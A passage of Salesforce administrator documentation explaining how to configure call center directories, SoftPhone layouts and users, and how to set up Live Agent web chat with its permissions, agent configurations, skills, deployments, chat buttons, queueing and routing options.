Administrator tip sheet: Getting Started with Setting Up Call Centers

Customizing a Call Center Directory

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To manage call center directories:

Every call center in Salesforce CRM Call Center includes a call center directory that allows users to search for phone numbers
throughout your organization. You can customize call center directories by:

• Adding additional directory numbers, either to a single call center or to all defined call centers in your organization

• Updating phone number search layouts

See Also:
Setting Up Salesforce CRM Call Center
Managing Call Centers
Managing Call Center Users
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Adding a Number to a Call Center Directory

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To view, add, edit, or delete an additional directory number:

To customize call center directories by adding additional directory numbers, either to a single call center or to all defined call
centers in your organization:

1. From Setup, click Customize > Call Center > Directory Numbers. From this page, you can:

• Click Edit to edit an existing additional directory number.
• Click Del to delete an existing additional directory number.
• Click the name of an existing additional directory number to view its details in the Additional Directory Number Detail

page. From this page you can click Edit to edit the number, click Delete to delete it, or click Clone to quickly create
a new additional directory number with the same information as the existing number.

2. Click New to define a new additional directory number.
3. In the Name field, enter a label that identifies the additional directory number.
4. In the Phone field, enter the phone number, including any international country codes. Dialing prefixes, such as 9 or 1,

do not need to be included.
5. In the Call Center field, select the call center directory to which you want to add the new directory number. To add

the number to every call center directory in your organization, choose -- Global --.
6. In the Description field, optionally enter text that provides further information about the additional directory number.
7. Click Save to save the number and return to the All Additional Directory Numbers page. Alternatively, click Save & New

to save the number and create another.

Tip:  If you have a large number of directory numbers to define, use the Data Loader to create them in one step.

See Also:
Setting Up Salesforce CRM Call Center
Customizing a Call Center Directory
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Customizing SoftPhone Layouts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To view, create, edit, or delete a SoftPhone layout:

A SoftPhone is a customizable call-control tool that appears to users assigned to a call center with machines on which CTI
adapters have been installed. Similar to page layouts, you can design custom SoftPhone layouts and assign them to Salesforce
CRM Call Center users based on their user profile. See:

• Designing a Custom SoftPhone Layout

• Assigning a SoftPhone Layout to a User Profile

See Also:
Setting Up Salesforce CRM Call Center
Managing Call Centers
Administrator tip sheet: Getting Started with Setting Up Call Centers

Designing a Custom SoftPhone Layout

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To view, create, edit, or delete a SoftPhone layout:

In a SoftPhone layout you can control the call-related fields that are displayed and the Salesforce objects that are searched for
an incoming call. To design a custom SoftPhone layout:

1. From Setup, click Customize > Call Center > SoftPhone Layouts.
2. Click New to create a new SoftPhone layout definition, or click Edit next to the name of an existing layout definition to

view or modify it.
3. In the Name field, enter a label that uniquely identifies your SoftPhone layout definition.
4. In the Select Call Type picklist, choose the type of call for which the currently displayed SoftPhone layout should

be used. Every SoftPhone layout definition allows you to specify different layouts for inbound, outbound, and internal
calls. These three layouts are grouped together in a single SoftPhone layout definition.

5. In the Display these call-related fields section, click Edit to add, remove, or change the order of fields in
the currently-displayed SoftPhone layout:

• To add a field to the SoftPhone layout, select it in the Available list and click Add.
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• To remove a field from the SoftPhone layout, select it in the Selections list and click Remove.
• To change the order of a field in the SoftPhone layout, select it in the Selections list and click Up or Down.

Any changes that you make are automatically updated in the SoftPhone layout preview image on the right side of the page.
To hide the Available and Selections lists, click Collapse.

Phone-related fields only appear in a user's SoftPhone if a valid value for that field is available. For example, if you add a
Caller ID field to the layout of an outbound call, Caller ID will not appear.

6. In the Display these Salesforce Objects section, click Add/Remove Objects to add, remove, or change the
order of links to call-related objects.

7. Below the list of selected objects, click Edit next to each If single <Object> found, display row to specify the
fields that should be displayed in the SoftPhone layout if a single record for that object is the only record found. You can
add, remove, or change the order of fields.

8. In the Screen Pop Settings section (for inbound call types), click Edit next to each type of record-matching row to
specify which screens should display when the details of an inbound call match or don't match existing record(s) in Salesforce.
The following table describes each record-matching row and its screen pop options:

Screen Pop OptionsDescriptionRecord-Matching Row

Existing browser window

Select to display in open browser
windows.

Use to set where screen pops display.Screen pops open within

New browser window or tab

Select to display in new browser
windows or tabs.

Users' browsers may handle these
settings differently:

• Internet Explorer 6.0 always displays
screen pops in new windows.

• Internet Explorer 7.0 displays screen
pops based on what users select in
its tabs settings.

• Firefox 3.5 displays screen pops
based on what users select in its tabs
settings.

Don't pop any screen

Select if you don't want any screen
to display.

Use to set the screen pop options for
when the details of an inbound call
don't match any existing Salesforce
records.

No matching records

Pop to new

Select to display a new record page
you specify from the drop-down
list.
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Screen Pop OptionsDescriptionRecord-Matching Row

Pop to Visualforce page

Select to display a specific
Visualforce page.

The CTI adapter passes data from
the call to the Visualforce page via
a URL. This includes at least ANI
(the caller ID) and DNIS (the
number that the caller dialed). The
URL can pass additional data to
the Visualforce page if necessary.

Don't pop any screen

Select if you don't want any screen
to display.

Use to set the screen pop options for
when the details of an inbound call
match one existing Salesforce record.

Single-matching record

Pop detail page

Select to display the matching
record's detail page.

Pop to Visualforce page

Select to display a specific
Visualforce page.

The CTI adapter passes data from
the call to the Visualforce page via
a URL. This includes at least ANI
(the caller ID) and DNIS (the
number that the caller dialed). The
URL can pass additional data to
the Visualforce page if necessary.

Don't pop any screen

Select if you don't want any screen
to display.

Use to set the screen pop options for
when the details of an inbound call
match more than one existing Salesforce
record.

Multiple-matching records

Pop to search page

Select to display a search page.

Pop to Visualforce page

Select to display a specific
Visualforce page.

The CTI adapter passes data from
the call to the Visualforce page via
a URL. This includes at least ANI
(the caller ID) and DNIS (the
number that the caller dialed). The
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Screen Pop OptionsDescriptionRecord-Matching Row

URL can pass additional data to
the Visualforce page if necessary.

To hide expanded record-matching rows, click Collapse.

This section only displays if your CTI adapter was built using the CTI Developer's Toolkit 2.0 or higher.

9. Configure SoftPhone layouts for any remaining call types in the Select Call Type picklist.
10. Click Save.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
Setting Up Salesforce CRM Call Center
Assigning a SoftPhone Layout to a User Profile
Administrator tip sheet: Getting Started with Setting Up Call Centers

Assigning a SoftPhone Layout to a User Profile

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To assign a SoftPhone layout to a user profile:

Once you have defined one or more custom SoftPhone layouts, you can assign them to user profiles:

1. From Setup, click Customize > Call Center > SoftPhone Layouts.
2. Click Layout Assignment.
3. For each user profile that appears in the page, select the SoftPhone layout that the profile should use. Profiles are only

listed in this page if they include users that are currently assigned to a call center, or if they have already been assigned a
custom SoftPhone layout.

4. Click Save.
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Note:  Call center users will see their newly assigned SoftPhone layout the next time they log into Salesforce.

See Also:
Setting Up Salesforce CRM Call Center
Customizing SoftPhone Layouts
Administrator tip sheet: Getting Started with Setting Up Call Centers

Enabling HTTPS in a Call Center

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Call Centers”

To enable HTTPS in a call center:

With CTI adapters built with version 4.0 of the CTI Toolkit, you can specify a secure URL, or one that uses the secure
hypertext transfer protocol (HTTPS), for your call center. Using HTTPS provides added security for your call center, and
also helps prevent the Mixed Content warnings that can appear in your browser if your Salesforce organization uses the HTTPS
protocol but your call center does not.

To enable HTTPS:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click the name of acall center.
3. Click Edit.
4. Type the secure URL for your adapter in CTI Adapter URL. For example, https://localhost:11000.
5. Click Save.

Important:  In addition to specifying a secure URL on the Call Center Settings page, you also need to make changes
to the CTI adapter's configuration file, and create and install a new certificate for the CTI adapter. For more
information, see the CTI Toolkit Developer's Guide.
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Note:  Previous versions of CTI are secure but use Windows® technologies that are different than those in CTI 4.0.

See Also:
Salesforce CTI Toolkit Overview
Setting Up Salesforce CRM Call Center

Managing Call Center Users
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To add or remove users from a call center:

A Salesforce user cannot view Salesforce CRM Call Center features unless an administrator has assigned the user to a call
center. See the following for instructions:

• Adding a User to a Call Center

• Removing a User from a Call Center

Every call center user has access to a set of personal SoftPhone settings that specify:

• Whether the user should be automatically logged into his or her SoftPhone when he or she logs into Salesforce

• How a record should be displayed when it is the only one that matches an incoming call

To change the default personal SoftPhone settings for all new call center users, use the Force.com API.

See Also:
Setting Up Salesforce CRM Call Center
Creating a Call Center
Managing Call Centers
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Adding a User to a Call Center

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To add users to a call center:

To add a user to a call center in Salesforce CRM Call Center:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click the name of the call center to which you want to assign the Salesforce user.
3. In the Call Center Users related list, click Manage Call Center Users.
4. Click Add More Users.
5. Specify search criteria to find the Salesforce users who should be assigned to the call center.
6. Click Find to display the list of Salesforce users that meet your search criteria. All users who already belong to a call center

are excluded from search results because a user can only be assigned to one call center at a time.
7. Select the checkbox next to each user who should be assigned to the call center and click Add to Call Center.

Alternatively, you can change a particular user's call center in the User Edit page:

1. From Setup, click Manage Users > Users.
2. Click Edit next to the name of the user.

3. Modify the Call Center field as appropriate. You can change the user's call center by clicking the lookup icon ( ) and
choosing a new call center, or you can remove the user from his or her current call center by deleting the call center name
from the field.

See Also:
Setting Up Salesforce CRM Call Center
Managing Call Center Users
Creating a Call Center
Administrator tip sheet: Getting Started with Setting Up Call Centers
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Removing a User from a Call Center

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Call Centers”To remove users from a call center:

To remove a user from a call center in Salesforce CRM Call Center:

1. From Setup, click Customize > Call Center > Call Centers.
2. Click the name of the call center from which you want to remove the Salesforce user.
3. In the Call Center Users related list, click Manage Call Center Users.
4. Click Remove next to the name of the user that you want to remove from the call center.

To remove multiple users at once, select the Action checkbox next to each user you want to remove and click Remove
Users.

Alternatively, you can change a particular user's call center in the User Edit page:

1. From Setup, click Manage Users > Users.
2. Click Edit next to the name of the user.

3. Modify the Call Center field as appropriate. You can change the user's call center by clicking the lookup icon ( ) and
choosing a new call center, or you can remove the user from his or her current call center by deleting the call center name
from the field.

See Also:
Setting Up Salesforce CRM Call Center
Managing Call Center Users
Creating a Call Center
Administrator tip sheet: Getting Started with Setting Up Call Centers
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CREATING WEB-CHAT CHANNELS

Setting Up Live Agent

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To set up Live Agent:

“Manage Users”To create user profiles or permission sets:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

1. Enable Live Agent for your organization.
2. Create user profiles or permission sets to determine which users can access chat transcripts and visitor records.
3. Create Live Agent users.
4. Assign users a configuration to give them access to the Live Agent console or Live Agent in the Service Cloud console.
5. Identify a set of skills to help route incoming chats to the right agents.
6. Create skills and assign users to them.
7. Determine the number and type of deployments that your organization requires.
8. If you want to brand the chat windows your visitors see (for example, to display your company's logo), create one or more

Force.com sites to host the images.
9. Upload the images as static resources.
10. Create deployments, and add the deployment code to each Web page that will have a chat button.
11. Create chat buttons.

Optionally:

• Customize the Live Chat Transcript page.

• Customize the Live Chat Visitor page.

• Add a custom Chat Answer field to Salesforce Knowledge article types to let agents copy information from an article into
a chat.

• Create Quick Text messages to help agents chat with customers more efficiently.

• Set up Live Agent in the Service Cloud console.
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Setup Tips

• We recommend that advanced Salesforce administrators and developers set up and maintain Live Agent, as the process
involves multiple steps and significant customization.

• Live Agent requires feature licenses, which you can purchase by contacting salesforce.com. Each Live Agent user needs
his or her own feature license.

• We recommend that you review the following questions before setting up Live Agent:

◊ How many deployments do you need? Deployments control the look and feel of your chat windows. If your customer
service department supports multiple products or websites, you may want to create several different deployments.

◊ How do you want to divide and define agent skill sets? Each chat button you create is associated with a particular skill,
such as technical support, billing, or general inquiries. Before you can create chat buttons, you need to create skills and
assign them to users or user profiles.

◊ How many agent configurations do you need? Configurations determine agents’ chat capacity, or how many active
chats they can participate in at a time, as well as the chatlets they have access to. You may want to create one configuration
for junior agents, for example, with a low chat capacity and access to only the basic chatlets, and another for supervisors,
with a higher chat capacity and access to all chatlets.

◊ What Quick Text categories and subcategories do you need? Defining and creating an effective categorization system
for your Quick Text messages will make it easier for agents to find the ones they need when chatting with customers.

◊ Do you want your users to see customized pre-chat forms or post-chat pages? You might want to create a pre-chat
form that collects information such as a user’s name and a short description of their question or issue, for example, or
a post-chat page with a link to a survey about the customer’s experience with your support team.

Creating pre-chat forms and post-chat pages requires knowledge of HTML, Javascript, and Visualforce.

• If you choose to use a Force.com site to customize your chat buttons or deployments, you need to create the site and upload
images to it as static resources before creating buttons or deployments.

See Also:
Live Agent Deployment Overview
Assigning Live Agent Permissions

Assigning Live Agent Permissions

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Access to and interactions with certain types of Live Agent records, such as chat transcripts, visitor records, and Quick Text
messages, are controlled by object permissions. When you create profiles or permission sets for Live Agent users, you’ll grant
“Create,” “Read,” “Edit,” or “Delete” permissions on objects depending on the functionality your users need. For example:

• The API Enabled administrative permission is required for all Live Agent users.

• Agents need at least the “Read” permission on Live Chat Visitors and Live Chat Transcripts to review visitor and transcript
records.

• In addition, you might need to give users in supervisory or compliance roles “Create,” Edit,” and “Delete” permissions on
these objects. For example, supervisors may need to flag some records for follow up for training purposes, or they may need
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to add additional comments or update other information in the records. For compliance purposes, some users might need
to delete records if they contain sensitive information.

• Other users who want to see transcripts and visitor records will need “Read” permission on these objects.

• To create Quick Text messages, users need “Create,” “Read,” “Edit,” and “Delete” permissions on the Quick Text object.

• To access the Quick Text sidebar in the Live Agent console or Live Agent in the Service Cloud console, agents need at
least “Read” permission on Quick Text.

Note: Salesforce automatically creates visitor and transcript records for each chat regardless of which permissions an
agent has on Live Chat Visitor and Live Chat Transcript.

Enabling Live Agent

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To enable Live Agent:

To enable Live Agent for your organization:

1. From Setup, click Customize > Live Agent > Settings.
2. Select Enable Live Agent.
3. Click Save.

Creating Live Agent Users

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Manage Users”To create or edit users:

1. From Setup, click Manage Users > Users.
2. Click Edit next to a user's name.
3. Select Live Agent User. If you don’t see this checkbox, make sure your organization has purchased enough Live Agent

feature licenses.
4. Make sure the user has the correct profile based on the permissions required.
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5. Click Save.

After creating users, make sure that you assign them a Live Agent configuration and associate them with the appropriate skills.

Agent Configuration Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

Agent configurations control the following functionality of the Live Agent console and Live Agent in the Service Cloud
console:

• Which chatlets on page 1734 are enabled (Live Agent console only).

• Chat capacity, which is the number of simultaneous chat sessions an agent can participate in.

• Whether or not a sound plays when a new chat is available or when the agent is disconnected from a chat session.

• Whether or not notifications appear in the agent’s browser for incoming chat requests.

• Whether or not sneak peek is enabled. Sneak peek lets agents see what visitors are typing before visitors send messages.

• The greeting message that appears automatically to visitors when a chat begins.

You give Live Agent users access to the Live Agent console or Live Agent in the Service Cloud console by assigning them a
configuration either through a profile or at the user level. If a user is assigned a configuration at both the profile and user level,
the user-level configuration overrides the profile one. You can only assign users to one configuration at a time.

Users that aren’t associated with a configuration get the default configuration:

• All chatlets enabled (Live Agent console only)

• Unlimited chat capacity

• Sneak peek enabled

• Request sound and disconnect sounds disabled

• Auto greeting disabled

Configurations let you give agents the functionality that makes sense for their skill levels and job requirements. For example,
you might want to create different configurations for new and experienced agents. The configurations can contain the same
chatlets and visitor greeting, but specify different chat capacities: new agents are assigned a capacity of two chats, while
experienced users are assigned a capacity of five chats. Then, depending on what makes sense for your organization, you can
assign configurations by:

• Creating separate profiles for new and experienced agents, and then associating the new agent profile with the new agent
configuration, and the advanced agent profile with the advanced configuration.

• Creating a single profile, assigning it to the new agent configuration, and then assigning the advanced configuration to
experienced agents the at the user level.
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The number of configurations you have may depend on the size of your organization. For example, in a small organization,
you might have three configurations: one for new agents, one for experienced agents, and a third for supervisors. In a global
enterprise, you could have dozens of configurations. We recommend that you assess your organization’s configuration
requirements as part of your implementation planning.

See Also:
Creating Agent Configurations
Setting Up Live Agent

Creating Agent Configurations

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create and edit configurations:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

For efficiency, consider creating profiles and users before creating configurations so that you can create a configuration and
assign it at the same time.

1. From Setup, click Customize > Live Agent > Agent Configuration.
2. Click New.
3. Enter a name for the configuration. This name, or a version of it, automatically becomes the Developer Name.
4. Enter a value in Chat Capacity to specify the maximum number of chats an agent can participate in simultaneously.

Entering zero or leaving the value blank gives the agent unlimited chat capacity.

5. Select Sneak Peek Enabled to let agents preview what visitors type before they send a message.
6. Select Request Sound Enabled to play a tone when a new chat request is available.

The tone isn't customizable.

7. Select Disconnect Sound Enabled to play a tone when an agent gets disconnected from the Live Agent console.

The tone isn't customizable.

8. Select Notifications Enabled to display a desktop alert when a new chat request is available.

Note:  Alerts and notifications are supported only in certain browsers. See Live Agent Notifications Overview on
page 1735 for more information.

9. Enter a message in Auto Greeting that visitors see when they start a new chat session.
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10. Select Auto Away on Decline to automatically change agents’ status to Away when they decline chat requests. Note:
this option applies only when agents are assigned to chat buttons that use push routing.

11. Select the chatlets on page 1734 to include in the Live Agent console.
12. In the Assign Users area, select individual users for the configuration.
13. In the Assign Profiles area, select profiles for the configuration.

When you associate a profile with a configuration, all users with that profile are assigned the configuration unless they are
assigned a different configuration at the user level. See Agent Configuration Overview  for more information.

Creating Skills

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create skills:

To create a skill and assign it to users:

1. From Setup, click Customize > Live Agent > Skills.
2. Click New.
3. Enter a name for the skill.
4. In the Assign Users area, select the users you want to associate with the skill.
5. In the Assign Profiles area, select the profiles you want to associate with the skill.
6. Click Save.

Skills Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Skills identify the capabilities of agents, and are used to route requests to the right set of agents. For example, if your support
center handles both technical and end-user issues, you’d create separate “Technical” and “End User” skills, and assign agents
accordingly. Then, when a query comes in that requires technical expertise, Salesforce routes the request to those agents in
the “Technical” skill set only.

You can assign skills to both profiles and individual users, and you can associate both users and profiles with multiple skills.
For example, if your organization supports laptop, desktop, and tablet computers, you'd assign all three computer skills to
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agents qualified to provide support on each type of computer, while you'd assign just the “desktop” skill to agents only trained
on desktop computers.

During implementation planning, we recommend that you identify the skills that you’ll assign to agents. If your organization’s
agents can handle any chat request, then you need to create only one skill. However, it’s more likely that your agents are
specialized, and you’ll need to create skills to make sure that they receive the appropriate requests.

See Also:
Chat Button Overview
Setting Up Live Agent

Creating Deployments

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create deployments:

If you plan to customize the Chat window (for example, brand the window with your company's logo), you need to upload
images as static resources and then create one or more Force.com sites to host the images. Note that when you create a
Force.com site for use with Live Agent, you need to provide only the following information:

• A site label and a site name
• A site contact
• The active site's home page
• A site template

To create a deployment:

1. From Setup, click Customize > Live Agent > Deployments.
2. Click New.
3. Enter a name for the deployment. This name, or a version of it, automatically becomes the Developer Name.
4. Enter a title for the Chat window.

This is the title that visitors see.

5. Select Allow Visitors to Save Transcripts to let visitors download a copy of the chat session when it ends.
6. Optionally, list the domains that can host the deployment.
7. Select the site that you'll associate with the deployment.

Visitors see this URL in the Chat window.

8. In Chat Window Branding Image, select the graphic that will appear in the Chat window.
9. In Mobile Chat Window Branding Image, select the graphic that visitors using mobile devices will see in the Chat

window.
10. Click Save.
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Salesforce generates the deployment code.
11. Copy the deployment code and paste it on each Web page where you want to deploy Live Agent. For best performance,

paste the code right before the closing body tag (that is, </body>).

Note:  If you’re using security zones in Internet Explorer 8 or 9, be sure your deployment and any website that
hosts that deployment are in the same security zone. Due to an issue with Internet Explorer, it’s not possible to
launch a chat window from a website that’s in a different security zone. For more information on security zones,
refer to Internet Explorer help.

After creating deployments, you need to create the buttons that visitors click to initiate chat sessions, and then add that code
to web pages as well.

See Also:
Live Agent Deployment Overview
Using Permitted Domains with Live Agent Deployments
Setting Up Live Agent

Live Agent Deployment Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

A deployment is a place on your company's website that's enabled for Live Agent. Deployments let you:

• Create the code that you add to Web pages to enable them for Live Agent.

• Control the appearance of the chat window that visitors access from the Web page. You do this by adding images (for
example, your company's logo) to a deployment to brand it.

• Enhance security and minimize the number of illegitimate chat requests you receive by specifying the domains allowed to
host chat buttons.

• Segment your visitor traffic to better understand the different types of visitors using chat for service or sales support. Chat
agents can see deployment information for each visitor, and the deployment is saved as part of the chat transcript.

A deployment consists of a few lines of JavaScript that you add to a Web page. Your organization can have a single Live Agent
deployment or multiple deployments. For example, if you have a single service center that supports multiple websites, creating
a separate deployment for each site lets you present different chat windows to your visitors.

See Also:
Creating Deployments
Using Permitted Domains with Live Agent Deployments
Chat Button Overview
Creating Chat Buttons
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Using Permitted Domains with Live Agent Deployments

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

A deployment is a place on your company's website that's enabled for Live Agent. To enhance security and minimize the
number of illegitimate chat requests you receive, use the permitted domains option when creating a deployment. This option
lets you specify the domains that can host the deployment.

When using permitted domains:

• List as many domains as you’d like but only one per line.

• Use only the domain and subdomain—for example, xyz.domain.com, domain.com, or www.domain.com. Don’t include
http:// or mappings to specific pages within a domain, such as domain.com/page.

• Be sure to specify all the domains you want to allow to host the deployment.

• If you want to make the deployment usable on any domain, leave the Permitted Domains box empty.

See Also:
Live Agent Deployment Overview
Creating Deployments

Creating Chat Buttons

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create and customize chat buttons:

Before you create chat buttons, you need to:

• Create skills. Each chat button is associated with a particular skill or set of skills so that chats initiated from the button are
routed to the right agents.

• Create a Force.com site if you’ll be using it to host the images for the online and offline versions of your button. If you
don’t have a Force.com site, you can specify online and offline button images or text by modifying the code that’s generated
when you create a button.

• Decide how you want chat requests that come in through the button to be routed to agents.

To create a button:

1. From Setup, click Customize > Live Agent > Chat Buttons.
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2. Click New.
3. Type a name for the button.
4. Select one or more skills to associate with the button by moving them from the Available Skills list to the Selected

Skills list.
5. Select a routing option for chats initiated through the button.
6. Optionally, if you select the Least Active or Most Available routing option, specify how long agents have to answer incoming

chat requests before they’re re-routed.
7. Optionally, enable queueing for incoming chat requests, and specify the maximum number of requests that can be in the

queue.
8. Customize your chat button using one of these options:

StepsPrerequisitesOption

Create a Force.com site that has the
following information:

Use a Force.com site a. In Site for Resources, select
the site that hosts your chat button
images.• A site label and a site name

b. In Online Image, select the
button image that visitors will see

• A site contact
• The active site's home page

when agents with the associated skill
are available to chat.

• A site template

c. In Offline Image, select the
button image that visitors will see
when no agents are available.

d. Optionally, in Custom Chat
Page, select the page you want to
use instead of the standard chat
window.

e. Click Save. Salesforce generates the
button code.

You’ll need access to a text or HTML
editor in order to change the button

Use custom code a. Click Save. (You don’t need to enter
anything in the Chat Button

code. You may want to have a developer
do this customization.

Customization fields.) Salesforce
generates the button code.

b. Copy and paste the Chat Button
Code into a text or HTML editor.

c. Replace the <!-- Online Chat
Content --> and <!-- Offline
Chat Content --> comments
with code for the chat button images
or text you want to use.

9. Optionally, choose the Visualforce page, or type the URL of the external Web page, that hosts the pre-chat form and
post-chat page for the button.

10. Copy the button code and paste it on each Web page where you've deployed Live Agent. Make sure to paste the code in
the area on the page where you want the button to appear.
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Tip:  Remember to copy and paste the code each time you update the button, as the code changes with each
modification.

See Also:
Chat Button Overview
Live Agent Deployment Overview
Creating Deployments
Setting Up Live Agent

Chat Button Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

You need to create the buttons that visitors click to start chats. Like a deployment, a button consists of several lines of JavaScript
that you copy and paste into Web pages. A single deployment can have multiple buttons; each button lets you refine the chat
experience for visitors. For example, your Service deployment could have different buttons for personal computer, laptop, or
tablet issues. Each button is mapped to a different skill or set of skills to make sure that visitors’ inquiries only go to agents
who have the ability to solve their problems.

Creating a chat button typically involves these steps:

1. Name the button.
2. Associate it with one or more of the skills that you've assigned to agents.
3. Choose a language for the chat window. You can select any of the languages fully supported by Salesforce.
4. Choose how you want chats initiated through the button to be routed to agents. Optionally, if you choose a push routing

option, specify how long agents have to answer incoming chat requests before they’re re-routed.
5. Optionally, enable queueing for chat requests initiated through the button and set a maximum queue length.
6. Choose an online and, optionally, an offline image for the button.

Similarly to the branding images you add to deployments, you can upload the button images as static resources and then
specify a Force.com site to host the images. Alternatively, you can specify online and offline button images or text by
modifying the code that is generated when you create a button.

7. Optionally:

a. Choose a custom chat page to use instead of the standard chat window.
b. Choose the page or URL that hosts the pre-chat form for the button.
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c. Choose the page or URL that hosts the post-chat page for the button.

See Also:
Creating Chat Buttons
Creating Skills
Setting Up Live Agent

Live Agent Chat Queues Overview
Queueing options in Live Agent let you specify how incoming chat requests are handled when there are no agents available.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Customize Application”To create and customize chat buttons:

For each Live Agent chat button you create, you can enable queueing to put incoming chat requests on hold if no agents with
the required skills are available to accept them. You can also specify the maximum number of requests in a queue. Enabling
queues and setting limits for them lets you control how incoming chat requests are handled and helps agents manage chat
backlogs.

With queueing enabled, your company can accept incoming chat requests even when agents are at capacity, and you can specify
the maximum number of requests to accept. This helps agents work more effectively and limits the amount of time customers
spend waiting to chat.

The following table explains how chat queueing works with the various routing options.

ResultsWith This Routing OptionQueueing Option

Choice routingQueuing is not enabled • Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in or
all online agents have reached
capacity.

• Incoming chat requests are added to
the Chat Requests list.

• When agents have capacity for new
chat sessions, they can select
incoming requests from the list.
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ResultsWith This Routing OptionQueueing Option

Least Active or Most Available routingQueuing is not enabled • Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in or
all online agents have reached
capacity.

• Incoming chat requests are added to
the Chat Requests list, which agents
do not see.

• When agents have the capacity for
new chat sessions, requests are routed
to them.

Choice routingQueueing is enabled without a per-agent
or overall limit

• Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in.

• Incoming chat requests are added to
the Chat Requests list.

• When agents have capacity for new
chat sessions, they can select
incoming requests from the list.

Least Active or Most Available routingQueueing is enabled without a per-agent
or overall limit

• Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in.

• Incoming chat requests are added to
the Chat Requests list, which agents
do not see.

• When agents have the capacity for
new chat sessions, requests are routed
to them.

Choice routingQueueing is enabled with a per-agent or
overall limit defined

• Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in, or
until the queue limit is reached. They
then see the offline version of the
button until older chat sessions have
ended.

• Incoming chat requests are added to
the queue until the per-agent or
overall limit is reached, at which
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ResultsWith This Routing OptionQueueing Option

point no new requests are accepted
until older chat sessions have ended.

• When agents have capacity for new
chat sessions, they can select
incoming requests from the list.

Least Active or Most Available routingQueueing is enabled with a per-agent or
overall limit defined

• Users see the online version of your
chat button and can submit new
requests unless there are no agents
with the required skill logged in, or
until the queue limit is reached. They
then see the offline version of the
button until older chat sessions have
ended.

• Incoming chat requests are added to
the queue until the per-agent or
overall limit is reached, at which
point no new requests are accepted
until older chat sessions have ended.

• When agents have the capacity for
new chat sessions, requests are routed
to them.

Live Agent Chat Routing Overview
Routing options in Live Agent let you specify how incoming chat requests should be directed to agents.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

For each Live Agent chat button you create, you specify how you want chats initiated through that button routed to agents.
Choose one of three routing options:

DescriptionRouting Option

Incoming chat requests are added to the queue in the Live
Agent console or Live Agent in the Service Cloud console
and are available to any agent with the required skill.

Choice

Incoming chats are routed to the agent with the required skill
who has the fewest active chats.

Least Active
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DescriptionRouting Option

Incoming chats are routed to the agent with the required skill
and the greatest difference between chat capacity and active

Most Available

chat sessions. For example, if Agents A and B each have a
chat capacity of five, and Agent A has three active chat sessions
while Agent B has only one, incoming chats will be routed to
Agent B.

Least Active and Most Available are push options, which means that incoming chats are routed, or “pushed,” to agents. If you
choose one of these options, you can also specify the amount of time an agent has to answer a chat request before it’s routed
to the next available qualified agent.

See Also:
Creating Chat Buttons
Live Agent Chat Queues Overview

Live Agent Supervisor Page Overview

Live Agent is available in: Developer Edition organizations created after June 14, 2012

